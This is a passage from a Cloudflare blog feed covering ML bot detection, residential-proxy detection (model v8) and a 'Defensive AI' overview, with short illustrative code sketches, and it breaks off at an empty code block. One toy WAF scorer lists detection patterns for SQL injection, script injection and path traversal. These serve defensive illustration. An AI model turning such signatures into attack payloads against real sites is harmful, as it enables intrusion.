            </figure><p>Any customer with an existing WAF rule set to challenge visitors with a bot score below 30 (our recommendation) automatically challenged all of this AI bot traffic with no new action on their part. The same will be true for future AI bots that use similar techniques to hide their activity.</p><p>We leverage Cloudflare’s global signals to calculate our Bot Score, which, for AI bots like the one above, reflects that we correctly identify and score them as a “likely bot.”</p><p>When bad actors attempt to crawl websites at scale, they generally use tools and frameworks that we are able to fingerprint. For every fingerprint we see, we use Cloudflare’s network, which sees over 57 million requests per second on average, to understand how much we should trust this fingerprint. To power our models, we compute global aggregates across many signals. Based on these signals, our models were able to appropriately flag traffic from evasive AI bots, like the example mentioned above, as bots.</p><p>The upshot of this globally aggregated data is that we can immediately detect new scraping tools and their behavior without needing to manually fingerprint the bot, ensuring that customers stay protected from the newest waves of bot activity.</p><p>If you have a tip on an AI bot that’s not behaving, we’d love to investigate. There are two options you can use to report misbehaving AI crawlers:</p><p>1. Enterprise Bot Management customers can submit a False Negative <a href="https://developers.cloudflare.com/bots/concepts/feedback-loop/">Feedback Loop</a> report via Bot Analytics simply by selecting the segment of traffic where they noticed misbehavior:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/iwX6mvdnqg3KGRN0dMHou/a7c0a39275680db58f49c9292ca180c7/image8.png" />
            
            </figure><p>2. We’ve also set up a <a href="https://docs.google.com/forms/d/14bX0RJH_0w17_cAUiihff5b3WLKzfieDO4upRlo5wj8/edit">reporting tool</a> where any Cloudflare customer can submit a report of an AI bot scraping their website without permission.</p><p>We fear that some AI companies intent on circumventing rules to access content will persistently adapt to evade bot detection. We will continue to keep watch, add more bot blocks to our AI Scrapers and Crawlers rule, and evolve our machine learning models to help keep the Internet a place where content creators can thrive and retain full control over which models their content is used to train or run inference on.</p> ]]></content:encoded>
            <category><![CDATA[Bots]]></category>
            <category><![CDATA[Bot Management]]></category>
            <category><![CDATA[AI Bots]]></category>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[Machine Learning]]></category>
            <category><![CDATA[Generative AI]]></category>
            <guid isPermaLink="false">4iUvyS3jKebfV9pHwg7pol</guid>
            <dc:creator>Alex Bocharov</dc:creator>
            <dc:creator>Santiago Vargas</dc:creator>
            <dc:creator>Adam Martinetti</dc:creator>
            <dc:creator>Reid Tatoris</dc:creator>
            <dc:creator>Carlos Azevedo</dc:creator>
        </item>
        <item>
            <title><![CDATA[Using machine learning to detect bot attacks that leverage residential proxies]]></title>
            <link>https://blog.cloudflare.com/residential-proxy-bot-detection-using-machine-learning/</link>
            <pubDate>Mon, 24 Jun 2024 13:00:17 GMT</pubDate>
            <description><![CDATA[ Cloudflare's Bot Management team has released a new Machine Learning model for bot detection (v8), focusing on bots and abuse from residential proxies ]]></description>
            <content:encoded><![CDATA[ <p></p><p>Bots using residential proxies are a major source of frustration for security engineers trying to fight online abuse. These engineers often see a similar pattern of abuse when well-funded, modern botnets target their applications. Advanced bots bypass country blocks, <a href="https://www.cloudflare.com/en-gb/learning/network-layer/what-is-an-autonomous-system/">ASN</a> blocks, and rate-limiting. Every time, the bot operator moves to a new IP address space until they blend in perfectly with the “good” traffic, mimicking real users’ behavior and request patterns. Our new Bot Management machine learning model (v8) identifies residential proxy abuse without resorting to IP blocking, which can cause false positives for legitimate users.  </p>
    <div>
      <h2>Background</h2>
      <a href="#background">
        
      </a>
    </div>
    <p>One of the main sources of Cloudflare’s <a href="https://developers.cloudflare.com/bots/concepts/bot-score/">bot score</a> is our bot detection machine learning model which analyzes, on average, over 46 million HTTP requests per second in real time. Since our first Bot Management ML model was released in 2019, we have continuously evolved and improved the model. Nowadays, our models leverage features based on request fingerprints, behavioral signals, and global statistics and trends that we see across our network.</p><p>Each iteration of the model focuses on certain areas of improvement. This process starts with a rigorous R&amp;D phase to identify the emerging patterns of <a href="https://www.cloudflare.com/learning/bots/what-is-a-bot-attack/">bot attacks</a> by reviewing <a href="https://developers.cloudflare.com/bots/concepts/feedback-loop/">feedback from our customers</a> and reports of missed attacks. In v8, we mainly focused on two areas of abuse. First, we analyzed the campaigns that leverage residential IP proxies, which are proxies on residential networks commonly used to launch widely distributed attacks against high profile targets. In addition to that, we improved model accuracy for detecting attacks that originate from cloud providers.</p>
    <div>
      <h3>Residential IP proxies</h3>
      <a href="#residential-ip-proxies">
        
      </a>
    </div>
    <p>Proxies allow attackers to hide their identity and distribute their attack. Moreover, IP address rotation allows attackers to directly bypass traditional defenses such as IP reputation and IP rate limiting. Knowing this, defenders use a plethora of signals to identify malicious use of proxies. In its simplest form, IP reputation signals (e.g., data center IP addresses, known open proxies, etc.) can lead to the detection of such distributed attacks.</p><p>However, in the past few years, bot operators have started favoring proxies operating in residential network IP address space. By using residential IP proxies, attackers can masquerade as legitimate users by sending their traffic through residential networks. Nowadays, residential IP proxies are offered by companies that facilitate access to large pools of IP addresses for attackers. Residential proxy providers claim to offer 30-100 million IPs belonging to residential and mobile networks across the world. Most commonly, these IPs are sourced by partnering with free VPN providers, as well as by embedding proxy SDKs in popular browser extensions and mobile applications. This allows residential proxy providers to gain a foothold on victims’ devices and abuse their residential network connections.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/Oob9FiycD6yIfYf8Xtdny/06e74f2dd0032ea4610dcab55b0ec38a/residential-proxy-architecture.jpg" />
            
            </figure><p>Figure 1: Architecture of a residential proxy network</p><p>Figure 1 depicts the architecture of a residential proxy. By subscribing to these services, attackers gain access to an authenticated proxy gateway address commonly using the HTTPS/<a href="https://datatracker.ietf.org/doc/html/rfc1928">SOCKS5</a> proxy protocol. Some residential proxy providers allow their users to select the country or region for the proxy exit nodes. Alternatively, users can choose to keep the same IP address throughout their session or rotate to a new one for each outgoing request. Residential proxy providers then identify active exit nodes on their network (on devices that they control within residential networks across the world) and route the proxied traffic through them.</p><p>The large pool of IP addresses and the diversity of networks poses a challenge to traditional bot defense mechanisms that rely on IP reputation and rate limiting. Moreover, the diversity of IPs enables the attackers to rotate through them indefinitely. This shrinks the window of opportunity for bot detection systems to effectively detect and stop the attacks. Effective defense against residential proxy attacks should be able to detect this type of bot traffic either based on single request features to stop the attack immediately, or identify unique fingerprints from the browsing agent to track and mitigate the bot traffic regardless of the IP source. Overly broad blocking actions, such as IP block-listing, by definition, would result in blocking legitimate traffic from residential networks where at least one device is acting as a residential proxy node.</p>
    <div>
      <h3>ML model training</h3>
      <a href="#ml-model-training">
        
      </a>
    </div>
    <p>At its heart, our model is built using a chain of modules that work together. Initially, we fetch and prepare training and validation datasets from our Clickhouse data storage. We use datasets with high confidence labels as part of our training. For model validation, we use datasets consisting of missed attacks reported by our customers, known sources of bot traffic (e.g., <a href="https://developers.cloudflare.com/bots/reference/verified-bots-policy/">verified bots</a>), and high confidence detections from other bot management modules (e.g., heuristics engine). We orchestrate these steps using Apache Airflow, which enables us to customize each stage of the ML model training and define the interdependencies of our training, validation, and reporting modules in the form of directed acyclic graphs (DAGs).</p><p>The first step of training a new model is fetching labeled training data from our data store. Under the hood, our dataset definitions are SQL queries that will materialize by fetching data from our Clickhouse cluster where we store feature values and calculate aggregates from the traffic on our network. Figure 2 depicts these steps as train and validation dataset fetch operations. Introducing new datasets can be as straightforward as writing the SQL queries to filter the desired subset of requests.</p>
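<p>To illustrate the idea of defining the pipeline’s interdependencies as a directed acyclic graph, here is a minimal, hypothetical sketch in plain Python (the real pipeline uses Apache Airflow; the step names below are invented for illustration):</p>

```python
# Hypothetical dependency graph for a model training pipeline:
# dataset fetches feed training and validation, which feed the report.
deps = {
    "fetch_train_dataset": [],
    "fetch_validation_dataset": [],
    "train_model": ["fetch_train_dataset"],
    "validate_model": ["train_model", "fetch_validation_dataset"],
    "publish_report": ["validate_model"],
}

def topo_order(deps):
    """Return a valid execution order for a DAG of pipeline steps."""
    order, done = [], set()
    def visit(step):
        if step in done:
            return
        for parent in deps[step]:   # run all upstream steps first
            visit(parent)
        done.add(step)
        order.append(step)
    for step in deps:
        visit(step)
    return order

print(topo_order(deps))
# → ['fetch_train_dataset', 'fetch_validation_dataset', 'train_model',
#    'validate_model', 'publish_report']
```

<p>Airflow resolves this ordering automatically from the declared task dependencies; the sketch only shows why expressing the stages as a DAG guarantees that, for example, validation never runs before both the model and the validation dataset are ready.</p>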
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3xmgPc689UWAHZi29CfIrp/c0d5dca3b3a497423b00c9456ea5dc7c/airflow-dag.jpg" />
            
            </figure><p>Figure 2: Airflow DAG for model training and validation</p><p>After fetching the datasets, we train our <a href="https://catboost.ai/">Catboost model</a> and tune its <a href="https://catboost.ai/en/docs/references/training-parameters/">hyper parameters</a>. During evaluation, we compare the performance of the newly trained model against the current default version running for our customers. To capture the intricate patterns in subsets of our data, we split certain validation datasets into smaller slivers called specializations. For instance, we use the detections made by our heuristics engine and managed rulesets as ground truth for bot traffic. To ensure that larger sources of traffic (large <a href="https://www.cloudflare.com/learning/network-layer/what-is-an-autonomous-system/">ASNs</a>, different HTTP versions, etc.) do not mask our visibility into patterns for the rest of the traffic, we define specializations for these sources of traffic. As a result, improvements in accuracy of the new model can be evaluated for common patterns (e.g., HTTP/1.1 and HTTP/2) as well as less common ones. Our model training DAG will provide a breakdown report for the accuracy, score distribution, feature importance, and <a href="https://shap.readthedocs.io/en/latest/generated/shap.Explainer.html">SHAP explainers</a> for each validation dataset and its specializations.</p><p>Once we are happy with the validation results and model accuracy, we evaluate our model against a checklist of steps to ensure the correctness and validity of our model. We start by ensuring that our results and observations are reproducible over multiple non-overlapping training and validation time ranges. 
Moreover, we check for the following factors:</p><ul><li><p>Check for the distribution of feature values to identify irregularities such as missing or skewed values.</p></li><li><p>Check for overlaps between training and validation datasets and feature values.</p></li><li><p>Verify the diversity of training data and the balance between labels and datasets.</p></li><li><p>Evaluate performance changes in the accuracy of the model on validation datasets based on their order of importance.</p></li><li><p>Check for model overfitting by evaluating the feature importance and SHAP explainers.</p></li></ul><p>After the model passes the readiness checks, we deploy it in shadow mode. We can observe the behavior of the model on live traffic in log-only mode (i.e., without affecting the <a href="https://developers.cloudflare.com/bots/concepts/bot-score/">bot score</a>). After gaining confidence in the model's performance on live traffic, we start onboarding beta customers, and gradually switch the model to active mode all while closely <a href="/monitoring-machine-learning-models-for-bot-detection">monitoring the real-world performance of our new model</a>.</p>
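<p>As an illustration, two of the readiness checks listed above might look like the following hedged sketch (toy data and thresholds; this is not our actual validation code):</p>

```python
def dataset_overlap(train_ids, validation_ids):
    """Fraction of validation rows that also appear in the training data.
    A readiness check would flag the model if this is non-zero."""
    train = set(train_ids)
    overlap = sum(1 for row in validation_ids if row in train)
    return overlap / len(validation_ids)

def label_balance(labels):
    """Share of positive (bot) labels; used to verify the training data
    is not dominated by a single class."""
    return sum(labels) / len(labels)

# Toy example with hypothetical request IDs and labels:
print(dataset_overlap(["a", "b", "c"], ["c", "d"]))  # → 0.5
print(label_balance([1, 0, 1, 1]))                   # → 0.75
```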
    <div>
      <h3>ML features for bot detection</h3>
      <a href="#ml-features-for-bot-detection">
        
      </a>
    </div>
    <p>Each of our models uses a set of features to make inferences about the incoming requests. We compute our features based on single request properties (single request features) and patterns from multiple requests (i.e., inter-request features). We can categorize these features into the following groups:</p><ul><li><p><b>Global features:</b> inter-request features that are computed based on global aggregates for different types of fingerprints and traffic sources (e.g., for an ASN) seen across our global network. Given the relatively lower cardinality of these features, we can scalably calculate global aggregates for each of them.</p></li><li><p><b>High cardinality features:</b> inter-request features focused on fine-grained aggregate data from local traffic patterns and behaviors (e.g., for an individual IP address)</p></li><li><p><b>Single request features:</b> features derived from each individual request (e.g., user agent).</p></li></ul><p>Our Bot Management system (named <a href="/scalable-machine-learning-at-cloudflare">BLISS</a>) is responsible for fetching and computing these feature values and making them available on our servers for inference by active versions of our ML models.</p>
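<p>A toy sketch of the difference between global aggregate features and single request features (the field names and values below are invented for illustration; the real feature set is far richer):</p>

```python
from collections import Counter

# Toy requests (hypothetical fields): each has an ASN, a fingerprint,
# and a user agent string.
requests = [
    {"asn": 13335, "fingerprint": "fp_a", "user_agent": "curl/8.0"},
    {"asn": 13335, "fingerprint": "fp_a", "user_agent": "Mozilla/5.0"},
    {"asn": 64512, "fingerprint": "fp_b", "user_agent": "Mozilla/5.0"},
]

# Global feature: how often each fingerprint is seen network-wide.
# Fingerprints have relatively low cardinality, so global aggregation
# is feasible at scale.
fingerprint_counts = Counter(r["fingerprint"] for r in requests)

# Single request feature: derived from one request in isolation.
def single_request_features(req):
    return {"ua_is_browser": req["user_agent"].startswith("Mozilla")}

features = {**single_request_features(requests[0]),
            "fingerprint_global_count": fingerprint_counts[requests[0]["fingerprint"]]}
print(features)  # → {'ua_is_browser': False, 'fingerprint_global_count': 2}
```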
    <div>
      <h2>Detecting residential proxies using network and behavioral signals</h2>
      <a href="#detecting-residential-proxies-using-network-and-behavioral-signals">
        
      </a>
    </div>
    <p>Attacks originating from residential IP addresses are commonly characterized by a spike in the overall traffic towards sensitive endpoints on the target websites from a large number of residential ASNs. Our approach for detecting residential IP proxies is twofold. First, we compare direct vs. proxied requests, looking for network-level discrepancies. Revisiting Figure 1, we notice that a request routed through residential proxies (red dotted line) has to traverse multiple hops before reaching the target, which affects the network latency of the request.</p><p>Based on this observation alone, we are able to characterize residential proxy traffic with a high true positive rate (i.e., all residential proxy requests have high network latency). While we were able to replicate this in our lab environment, we quickly realized that at the scale of the Internet, we run into numerous exceptions with false positive detections (i.e., non-residential proxy traffic with high latency). For instance, countries and regions that predominantly use satellite Internet would exhibit a high network latency for the majority of their requests due to the use of <a href="https://datatracker.ietf.org/doc/html/rfc3135">performance enhancing proxies</a>.</p><p>Realizing that relying solely on network characteristics of connections to detect residential proxies is inadequate given the diversity of the connections on the Internet, we switched our focus to the behavior of residential IPs. To that end, we observe that the IP addresses from residential proxies exhibit distinct behavior during periods of peak activity. While this observation singles out highly active IPs during their peak activity, the sheer size of residential proxy IP pools means that we often observe only a small number of requests from the majority of residential proxy IPs.</p><p>These periods of inactivity can be attributed to the temporary nature of residential proxy exit nodes.
For instance, when the client software (i.e., browser or mobile application) that runs the exit nodes of these proxies is closed, the node leaves the residential proxy network. One way to filter out periods of inactivity is to increase the monitoring time and penalize each IP address that exhibits residential proxy behavior for a period of time. This block-listing approach, however, has certain limitations. Most importantly, by relying only on IP-based behavioral signals, we would block traffic from legitimate users who may unknowingly run mobile applications or browser extensions that turn their devices into proxies. This is especially detrimental on mobile networks, where many users share their IPs behind <a href="https://en.wikipedia.org/wiki/Carrier-grade_NAT">CGNATs</a>. Figure 3 demonstrates this by comparing the share of direct vs proxied requests that we received from active residential proxy IPs over a 24-hour period. Overall, we see that 4 out of 5 requests from these networks belong to direct and benign connections from residential devices.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5vdkbz94Am2EHlL7tu9t3t/3256ae94bfee66c60ad71c6a6dbc7fc0/mlv8-blog-proxy-vs-direct.jpg" />
            
            </figure><p>Figure 3: Percentage of direct vs proxied requests from residential proxy IPs.</p><p>Using this insight, we combined behavioral and latency-based features along with new datasets to train a new <a href="https://www.cloudflare.com/learning/ai/what-is-machine-learning/">machine learning model</a> that detects residential proxy traffic on a per-request basis. This scheme allows us to block residential proxy traffic while allowing benign residential users to visit Cloudflare-protected websites from the same residential network.</p>
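<p>As a sketch of the measurement behind Figure 3, the proxied share of traffic from a set of IPs can be computed per request rather than per IP (toy data; the <code>proxied</code> flag here is a hypothetical label standing in for our detection):</p>

```python
def proxied_share(requests):
    """Fraction of requests that arrived via a residential proxy,
    given a per-request 'proxied' flag (hypothetical label)."""
    proxied = sum(1 for r in requests if r["proxied"])
    return proxied / len(requests)

# Toy traffic mirroring the rough 1-in-5 split described above:
traffic = [{"proxied": i % 5 == 0} for i in range(100)]
print(proxied_share(traffic))  # → 0.2
```

<p>Scoring per request, rather than block-listing the IP, is what lets the remaining 4-in-5 benign requests from the same residential network through.</p>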
    <div>
      <h2>Detection results and case studies</h2>
      <a href="#detection-results-and-case-studies">
        
      </a>
    </div>
    <p>We started testing v8 in shadow mode in March 2024. Every hour, v8 classifies more than 17 million unique IPs that participate in residential proxy attacks. Figure 4 shows the geographic distribution of IPs with residential proxy activity, belonging to more than 45 thousand ASNs in 237 countries/regions. Among the most commonly requested endpoints from residential proxies, we observe patterns of account takeover attempts, such as requests to /login, /auth/login, and /api/login.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3gGGhqngSzEkThZUoV3Fiw/d807f5456e3277e4aa24972588c59cf7/mlv8-blog-map-1.jpg" />
            
            </figure><p>Figure 4: Countries and regions with residential network activity. Marker sizes are proportional to the number of IPs with residential proxy activity.</p><p>Furthermore, we see significant improvements when evaluating our new machine learning model on previously missed attacks reported by our customers. In one case, v8 was able to correctly classify 95% of requests from distributed residential proxy attacks targeting the voucher redemption endpoint of the customer’s website. In another case, our new model successfully detected a previously missed <a href="https://www.cloudflare.com/learning/bots/what-is-content-scraping/">content scraping attack</a>, as evidenced by increased detection during the traffic spikes depicted in Figure 5. We are continuing to monitor the behavior of residential proxy attacks in the wild and work with our customers to ensure that we can provide robust detection against these distributed attacks.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1jstvGe6HudxtAS54UJPW6/9bde592cb0efc64fb7a86ba33bb25047/shadowmode-v8.jpg" />
            
            </figure><p>Figure 5: Spikes in bot requests from residential proxies detected by ML v8</p>
    <div>
      <h2>Improving detection for bots from cloud providers</h2>
      <a href="#improving-detection-for-bots-from-cloud-providers">
        
      </a>
    </div>
    <p>In addition to residential IP proxies, bot operators commonly use cloud providers to host and run bot scripts that attack our customers. To combat these attacks, we improved our ground truth labels for cloud provider attacks in our latest ML training datasets. Early results show that v8 detects 20% more bots from cloud providers, with up to 70% more bots detected on zones that are marked as <a href="https://developers.cloudflare.com/fundamentals/reference/under-attack-mode/">under attack</a>. We further plan to expand the list of cloud providers that v8 detects as part of our ongoing updates.</p>
    <div>
      <h2>Check out ML v8</h2>
      <a href="#check-out-ml-v8">
        
      </a>
    </div>
    <p>For existing Bot Management customers we recommend <a href="https://developers.cloudflare.com/bots/reference/machine-learning-models/#enable-auto-updates-to-the-machine-learning-models">toggling “Auto-update machine learning model”</a> to instantly gain the benefits of ML v8 and its residential proxy detection, and to stay up to date with our future ML model updates. If you’re not a Cloudflare Bot Management customer, <a href="https://www.cloudflare.com/application-services/products/bot-management/">contact our sales team</a> to try out <a href="https://www.cloudflare.com/application-services/products/bot-management/">Bot Management</a>.</p> ]]></content:encoded>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[Machine Learning]]></category>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[Proxying]]></category>
            <category><![CDATA[Bots]]></category>
            <category><![CDATA[Bot Management]]></category>
            <category><![CDATA[Application Services]]></category>
            <guid isPermaLink="false">2EZrHNgKqLkaTGqoRM9pMS</guid>
            <dc:creator>Bob AminAzad</dc:creator>
            <dc:creator>Santiago Vargas</dc:creator>
            <dc:creator>Adam Martinetti</dc:creator>
        </item>
        <item>
            <title><![CDATA[Defensive AI: Cloudflare’s framework for defending against next-gen threats]]></title>
            <link>https://blog.cloudflare.com/defensive-ai/</link>
            <pubDate>Mon, 04 Mar 2024 14:00:24 GMT</pubDate>
            <description><![CDATA[ From identifying phishing attempts to protecting applications and APIs, Cloudflare uses AI to improve the effectiveness of its security solutions to fight against new and more sophisticated attacks ]]></description>
            <content:encoded><![CDATA[ <p></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/xVD4cmhSUcJddNAFw2AJc/6fb1537ad293d5d4eee9059aae0eec9b/Personalized-defensive-AI.png" />
            
            </figure><p>Generative AI has captured the imagination of the world by being able to produce poetry, screenplays, or imagery. These tools can be used to improve human productivity for good causes, but they can also be employed by malicious actors to carry out sophisticated attacks.</p><p>We are witnessing phishing attacks and social engineering becoming more sophisticated as attackers tap into powerful new tools to generate credible content or interact with humans as if they were a real person. Attackers can use AI to build boutique tooling made for attacking specific sites with the intent of harvesting proprietary data and taking over user accounts.</p><p>To protect against these new challenges, we need new and more sophisticated security tools: this is how Defensive AI was born. Defensive AI is the framework Cloudflare uses when thinking about how intelligent systems can improve the effectiveness of our security solutions. The key to Defensive AI is data generated by Cloudflare’s vast network, whether generally across our entire network or specific to individual customer traffic.</p><p>At Cloudflare, we use AI to increase the level of protection across all security areas, ranging from <a href="https://www.cloudflare.com/application-services/solutions/">application security</a> to email security and our <a href="https://www.cloudflare.com/zero-trust/solutions/">Zero Trust platform</a>. This includes creating customized protection for every customer for API or email security, or using our huge amount of attack data to train models to detect application attacks that haven’t been discovered yet.</p><p>In the following sections, we will provide examples of how we designed the latest generation of security products that leverage AI to secure against AI-powered attacks.</p>
    <div>
      <h3>Protecting APIs with anomaly detection</h3>
      <a href="#protecting-apis-with-anomaly-detection">
        
      </a>
    </div>
    <p>APIs power the modern Web, comprising <a href="/2024-api-security-report/">57% of dynamic traffic</a> across the Cloudflare network, up from 52% in 2021. While APIs aren’t a new technology, securing them differs from securing a traditional web application. Because APIs offer easy programmatic access by design and are growing in popularity, fraudsters and threat actors have pivoted to targeting APIs. Security teams must now counter this rising threat. Importantly, each API is usually unique in its purpose and usage, and therefore <a href="https://www.cloudflare.com/application-services/solutions/api-security/">securing APIs</a> can take an inordinate amount of time.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5ojHc36uSFsnCBr870kK38/f4b7df6df5c60ffb087255ffb442e5e3/Screenshot-2024-03-01-at-1.39.29-PM.png" />
            
            </figure><p>Cloudflare is announcing the development of API Anomaly Detection for <a href="/api-gateway/">API Gateway</a> to protect APIs from attacks designed to damage applications, take over accounts, or <a href="https://www.cloudflare.com/learning/security/what-is-data-exfiltration/">exfiltrate data</a>. API Gateway provides a layer of protection between your hosted APIs and every device that interfaces with them, giving you the visibility, control, and security tools you need to manage your APIs.</p><p>API Anomaly Detection is an upcoming, ML-powered feature in our API Gateway product suite and a natural successor to <a href="/api-sequence-analytics">Sequence Analytics</a>. In order to protect APIs at scale, API Anomaly Detection learns an application’s business logic by analyzing client API request sequences. It then builds a model of what a sequence of expected requests looks like for that application. The resulting traffic model is used to identify attacks that deviate from the expected client behavior. As a result, API Gateway can use its <a href="https://developers.cloudflare.com/api-shield/security/sequence-mitigation/">Sequence Mitigation</a> functionality to enforce the learned model of the application’s intended business logic, stopping attacks.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/edeVw346MG6dZbjaDt97L/263e9c18c51f5320ce6e0c1d9ab957df/Screenshot-2024-03-01-at-2.01.25-PM-1.png" />
            
            </figure><p>While we’re still developing API Anomaly Detection, API Gateway customers can sign up <a href="https://www.cloudflare.com/lp/api-anomaly-detection/">here</a> to be included in the beta for API Anomaly Detection. Today, customers can get started with Sequence Analytics and Sequence Mitigation by reviewing the <a href="https://developers.cloudflare.com/api-shield/security/">docs</a>. Enterprise customers that haven’t purchased API Gateway can <a href="http://dash.cloudflare.com/?to=/:account/:zone/security/api-shield">self-start a trial</a> in the Cloudflare Dashboard, or contact their account manager for more information.</p>
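<p>To illustrate the sequence-learning idea behind API Anomaly Detection, here is a deliberately simplified sketch that learns endpoint-to-endpoint transitions from legitimate sessions and flags sequences that deviate (toy endpoints; the production system builds a far richer traffic model than a set of transitions):</p>

```python
def transitions(sequence):
    """Consecutive endpoint pairs in one client session."""
    return list(zip(sequence, sequence[1:]))

def learn_model(sessions):
    """Learn the set of transitions seen in legitimate sessions
    (a toy stand-in for the learned traffic model)."""
    return {pair for seq in sessions for pair in transitions(seq)}

def is_anomalous(sequence, model):
    """Flag a session containing a transition the model never saw."""
    return any(pair not in model for pair in transitions(sequence))

normal_sessions = [
    ["/login", "/account", "/cart", "/checkout"],
    ["/login", "/cart", "/checkout"],
]
model = learn_model(normal_sessions)
print(is_anomalous(["/login", "/cart", "/checkout"], model))  # → False
print(is_anomalous(["/checkout", "/account"], model))         # → True
```

<p>The second session is flagged because jumping from checkout back to the account page was never observed in legitimate traffic, which is the kind of business-logic deviation Sequence Mitigation can then act on.</p>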
    <div>
      <h3>Identifying unknown application vulnerabilities</h3>
      <a href="#identifying-unknown-application-vulnerabilities">
        
      </a>
    </div>
    <p>Another area where AI improves security is in our <a href="https://www.cloudflare.com/en-gb/learning/ddos/glossary/web-application-firewall-waf/">Web Application Firewall (WAF)</a>. Cloudflare processes 55 million HTTP requests per second on average and has an unparalleled visibility into attacks and exploits across the world targeting a wide range of applications.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3oTIWUwe5Em3tD4ACksp6b/0036dcdf5af715f4095ffb14ae9b3769/Screenshot-2024-03-01-at-1.41.23-PM.png" />
            
            </figure><p>One of the big challenges with the WAF is adding protections for new vulnerabilities while avoiding false positives. A WAF is a collection of rules designed to identify attacks directed at web applications. New vulnerabilities are discovered daily, and at Cloudflare we have a team of security analysts who create new rules when vulnerabilities are discovered. However, manually creating rules takes time — usually hours — leaving applications potentially vulnerable until a protection is in place. The other problem is that attackers continuously evolve and mutate existing attack payloads that can potentially bypass existing rules.</p><p>This is why Cloudflare has, for years, leveraged machine learning models that constantly learn from the latest attacks, deploying mitigations without the need for manual rule creation. This can be seen, for example, in our <a href="/stop-attacks-before-they-are-known-making-the-cloudflare-waf-smarter/">WAF Attack Score</a> solution. WAF Attack Score is based on an ML model trained on attack traffic identified on the Cloudflare network. The resulting classifier allows us to identify variations and bypasses of existing attacks as well as extend the protection to <a href="/how-cloudflares-ai-waf-proactively-detected-ivanti-connect-secure-critical-zero-day-vulnerability">new and undiscovered attacks</a>. Recently, we have made Attack Score <a href="/waf-attack-score-for-business-plan">available to all Enterprise and Business plans</a>.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/25Jw91tB0o7lKhsgzvbqPV/748a7365c126ba03e2382b3eff988c37/Screenshot-2024-03-01-at-18.16.22.png" />
            
            </figure><p><i>Attack Score uses AI to classify each HTTP request based on the likelihood that it’s malicious</i></p><p>While the contribution of security analysts is indispensable, in the era of AI and rapidly evolving attack payloads, a <a href="https://www.cloudflare.com/cybersecurity-risk-management/">robust security posture</a> demands solutions that do not rely on human operators to write rules for each novel threat. Combining Attack Score with traditional signature-based rules is an example of how intelligent systems can support tasks carried out by humans. Attack Score identifies new malicious payloads which can be used by analysts to optimize rules that, in turn, provide better training data for our AI models. This creates a reinforcing positive feedback loop improving the overall protection and response time of our WAF.</p><p>Long term, we will adapt the AI model to account for customer-specific traffic characteristics to better identify deviations from normal and benign traffic.</p>
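<p>To make the idea of request scoring concrete, here is a toy illustration of mapping payload features to a score. Cloudflare’s actual Attack Score is produced by a trained ML classifier, not a keyword heuristic; the patterns and score mapping below are invented purely for illustration:</p>

```python
import re

# Hypothetical "suspicious token" features; a real classifier learns
# far subtler signals from labeled attack traffic.
SUSPICIOUS = [r"union\s+select", r"<script", r"\.\./", r"sleep\(\d+\)"]

def attack_features(payload: str) -> int:
    """Count how many suspicious patterns appear in the payload."""
    return sum(bool(re.search(p, payload, re.IGNORECASE)) for p in SUSPICIOUS)

def attack_score(payload: str) -> int:
    """Map feature hits to a 1-99 style score (lower = more likely attack).
    The mapping is invented for this sketch."""
    return max(1, 99 - 30 * attack_features(payload))

print(attack_score("q=cloudflare+blog"))           # → 99 (benign)
print(attack_score("id=1 UNION SELECT password"))  # → 69
```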
    <div>
      <h3>Using AI to fight phishing</h3>
      <a href="#using-ai-to-fight-phishing">
        
      </a>
    </div>
    <p>Email is one of the most effective vectors leveraged by bad actors: the US Cybersecurity and Infrastructure Security Agency (<a href="https://www.cisa.gov/stopransomware/general-information">CISA</a>) reports that 90% of cyber attacks start with phishing, and Cloudflare Email Security <a href="https://radar.cloudflare.com/year-in-review/2023#malicious-emails">marked 2.6% of 2023's emails as malicious</a>. The rise of AI-enhanced attacks is making traditional email security providers obsolete, as threat actors can now craft phishing emails that are more credible than ever, with little to no language errors.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/27B73JPLutOrg6shC9gZnh/3e49607d69ce330333204c3d061d9fa5/Screenshot-2024-03-01-at-1.41.30-PM.png" />
            
</figure><p>Cloudflare <a href="https://developers.cloudflare.com/email-security/">Email Security</a> is a cloud-native service that stops phishing attacks across all threat vectors. Cloudflare’s email security product continues to protect customers with its AI models, even as trends like Generative AI continue to evolve. Cloudflare’s models analyze all parts of a phishing attack to determine the risk posed to the end user. Some of our AI models are personalized for each customer, while others are trained holistically. Privacy is paramount at Cloudflare, so only non-personally identifiable information is used by our tools for training. In 2023, <a href="/2023-phishing-report">Cloudflare processed approximately 13 billion emails</a> and blocked 3.4 billion of them, providing the email security product with a rich dataset that can be used to train AI models.</p><p>Two detections that are part of our portfolio are Honeycomb and Labyrinth.</p><ul><li><p><i>Honeycomb</i> is a patented email sender domain reputation model. This service builds a graph of who is sending messages and uses it to determine risk. Models are trained on specific customer traffic patterns, so every customer has AI models trained on what their good traffic looks like.</p></li><li><p><i>Labyrinth</i> uses ML to protect on a per-customer basis. Attackers attempt to spoof emails from our clients’ valid partner companies. We gather a list, with statistics, of known-good email senders for each of our clients. We can then detect a spoof attempt when an email is sent from an unverified domain while the domain mentioned in the email itself is a referenced/verified domain.</p></li></ul><p>AI remains at the core of our email security product, and we are constantly improving the ways we leverage it. If you want more information about how we use our AI models to stop AI-enhanced phishing attacks, check out our blog.</p>
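To make the Labyrinth idea concrete, here is a minimal sketch of that kind of check. The function name, inputs, and data are illustrative assumptions, not Cloudflare's actual detection, which relies on ML and per-customer sender statistics rather than a simple lookup:

```javascript
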